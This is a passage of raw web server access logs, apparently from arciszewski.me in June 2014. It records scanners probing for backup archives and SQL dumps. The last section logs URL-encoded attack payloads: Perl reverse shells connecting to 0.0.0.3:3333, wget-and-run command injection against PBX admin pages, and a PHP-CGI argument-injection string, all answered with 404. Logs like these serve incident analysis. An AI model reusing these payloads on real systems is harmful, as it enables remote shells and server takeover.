  156. 0.0.0.2 - - [16/Jun/2014:19:02:56 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  157. 0.0.0.2 - - [16/Jun/2014:19:02:56 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  158. 0.0.0.2 - - [16/Jun/2014:19:02:56 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  159. 0.0.0.2 - - [16/Jun/2014:19:02:56 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  160. 0.0.0.2 - - [16/Jun/2014:19:02:56 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  161. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  162. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  163. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  164. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  165. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  166. 0.0.0.2 - - [16/Jun/2014:19:02:58 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  167. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  168. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /arciszewski.tar.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  169. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  170. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  171. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  172. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  173. 0.0.0.2 - - [16/Jun/2014:19:02:59 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  174. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  175. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /backup.tar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  176. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  177. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  178. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  179. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  180. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  181. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  182. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /web.sql HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  183. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  184. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  185. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  186. 0.0.0.2 - - [16/Jun/2014:19:03:00 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  187. 0.0.0.2 - - [16/Jun/2014:19:03:01 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  188. 0.0.0.2 - - [16/Jun/2014:19:03:01 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  189. 0.0.0.2 - - [16/Jun/2014:19:03:01 +0400] "GET /wwwroot.sql.gz HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  190.  
  191. # {{{ And thusly... }}}}
  192.  
  193. 0.0.0.1 - - [19/Jun/2014:13:08:06 +0400] "HEAD /wwwroot.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  194. 0.0.0.1 - - [19/Jun/2014:13:08:07 +0400] "HEAD /wwwroot.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  195. 0.0.0.1 - - [19/Jun/2014:13:08:07 +0400] "HEAD /www.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  196. 0.0.0.1 - - [19/Jun/2014:13:08:08 +0400] "HEAD /www.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  197. 0.0.0.1 - - [19/Jun/2014:13:08:08 +0400] "HEAD /bbs.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  198. 0.0.0.1 - - [19/Jun/2014:13:08:09 +0400] "HEAD /bbs.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  199. 0.0.0.1 - - [19/Jun/2014:13:08:10 +0400] "HEAD /web.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  200. 0.0.0.1 - - [19/Jun/2014:13:08:10 +0400] "HEAD /web.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  201. 0.0.0.1 - - [19/Jun/2014:13:08:11 +0400] "HEAD /s.arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  202. 0.0.0.1 - - [19/Jun/2014:13:08:11 +0400] "HEAD /s.arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  203. 0.0.0.1 - - [19/Jun/2014:13:08:12 +0400] "HEAD /sarciszewskime.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  204. 0.0.0.1 - - [19/Jun/2014:13:08:12 +0400] "HEAD /sarciszewskime.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  205. 0.0.0.1 - - [19/Jun/2014:13:08:13 +0400] "HEAD /arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  206. 0.0.0.1 - - [19/Jun/2014:13:08:14 +0400] "HEAD /arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  207. 0.0.0.1 - - [19/Jun/2014:13:08:14 +0400] "HEAD /arciszewski.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  208. 0.0.0.1 - - [19/Jun/2014:13:08:15 +0400] "HEAD /arciszewski.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  209. 0.0.0.1 - - [19/Jun/2014:14:45:15 +0400] "HEAD /wwwroot.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  210. 0.0.0.1 - - [19/Jun/2014:14:45:15 +0400] "HEAD /wwwroot.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  211. 0.0.0.1 - - [19/Jun/2014:14:45:16 +0400] "HEAD /www.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  212. 0.0.0.1 - - [19/Jun/2014:14:45:17 +0400] "HEAD /www.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  213. 0.0.0.1 - - [19/Jun/2014:14:45:17 +0400] "HEAD /bbs.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  214. 0.0.0.1 - - [19/Jun/2014:14:45:18 +0400] "HEAD /bbs.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  215. 0.0.0.1 - - [19/Jun/2014:14:45:18 +0400] "HEAD /web.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  216. 0.0.0.1 - - [19/Jun/2014:14:45:19 +0400] "HEAD /web.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  217. 0.0.0.1 - - [19/Jun/2014:14:45:20 +0400] "HEAD /s.arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  218. 0.0.0.1 - - [19/Jun/2014:14:45:20 +0400] "HEAD /s.arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  219. 0.0.0.1 - - [19/Jun/2014:14:45:21 +0400] "HEAD /sarciszewskime.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  220. 0.0.0.1 - - [19/Jun/2014:14:45:21 +0400] "HEAD /sarciszewskime.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  221. 0.0.0.1 - - [19/Jun/2014:14:45:22 +0400] "HEAD /arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  222. 0.0.0.1 - - [19/Jun/2014:14:45:23 +0400] "HEAD /arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  223. 0.0.0.1 - - [19/Jun/2014:14:45:23 +0400] "HEAD /arciszewski.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  224. 0.0.0.1 - - [19/Jun/2014:14:45:24 +0400] "HEAD /arciszewski.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  225.  
  226. ################################################################################
  227. @ https://arciszewski.me @
  228. ================================================================================
  229. 0.0.0.3 - - [15/Jun/2014:12:24:14 +0400] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php HTTP/1.1" 404 177 "-" "-"
  230. 0.0.0.3 - - [15/Jun/2014:12:24:32 +0400] "GET /fuxkkk.php HTTP/1.1" 404 177 "-" "-"
  231. 0.0.0.3 - - [15/Jun/2014:12:24:38 +0400] "GET /recordings/theme/alexpass.php HTTP/1.1" 404 177 "-" "-"
  232. 0.0.0.3 - - [15/Jun/2014:12:29:43 +0400] "POST /admin/assets/index.php HTTP/1.1" 404 177 "-" "-"
  233. 0.0.0.3 - - [15/Jun/2014:12:29:51 +0400] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 177 "-" "-"
  234. 0.0.0.3 - - [15/Jun/2014:12:29:52 +0400] "GET /admin/Y-ivrrecording.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 177 "-" "-"
  235. 0.0.0.3 - vampire [15/Jun/2014:12:30:23 +0400] "POST /admin/assets/themes/case.php?act=tools&d=%2Ftmp HTTP/1.1" 404 177 "-" "-"
  236. 0.0.0.3 - vampire [15/Jun/2014:12:30:26 +0400] "POST /recordings/vamp/case.php?act=tools&d=%2Ftmp HTTP/1.1" 404 177 "-" "-"
  237. 0.0.0.3 - - [15/Jun/2014:12:34:18 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=888%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  238. 0.0.0.3 - - [15/Jun/2014:12:34:30 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=555%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  239. 0.0.0.3 - - [15/Jun/2014:12:34:31 +0400] "GET /recordings/misc/thaer.php?action=c&callmenum=888%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  240. 0.0.0.3 - - [15/Jun/2014:12:34:33 +0400] "GET /recordings/misc/thaer.php?action=c&callmenum=555%40ext-featurecodes%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%220.0.0.3%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cncmp%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27%0D%0A%0D%0A HTTP/1.1" 404 177 "-" "-"
  241. 0.0.0.3 - - [15/Jun/2014:12:34:46 +0400] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://0.0.0.3:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 177 "-" "-"
  242. 0.0.0.3 - - [15/Jun/2014:12:35:20 +0400] "GET /admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;cd%20/tmp;rm%20-f%20c;wget%20http://0.0.0.3:3003/c;perl%20c;rm%20-f%20c;%27 HTTP/1.1" 404 177 "-" "-"
  243. 0.0.0.3 - - [15/Jun/2014:12:40:03 +0400] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 177 "-" "-"
  244. 0.0.0.4 - - [16/Jun/2014:08:44:42 +0400] "GET /admin/config.php HTTP/1.0" 404 177 "-" "Python-urllib/1.17"
  245. 0.0.0.5 - - [17/Jun/2014:23:59:04 +0400] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 177 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
  246. 0.0.0.5 - - [17/Jun/2014:23:59:04 +0400] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 177 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
  247. 0.0.0.5 - - [17/Jun/2014:23:59:04 +0400] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 177 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
  248. 0.0.0.5 - - [17/Jun/2014:23:59:04 +0400] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 177 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
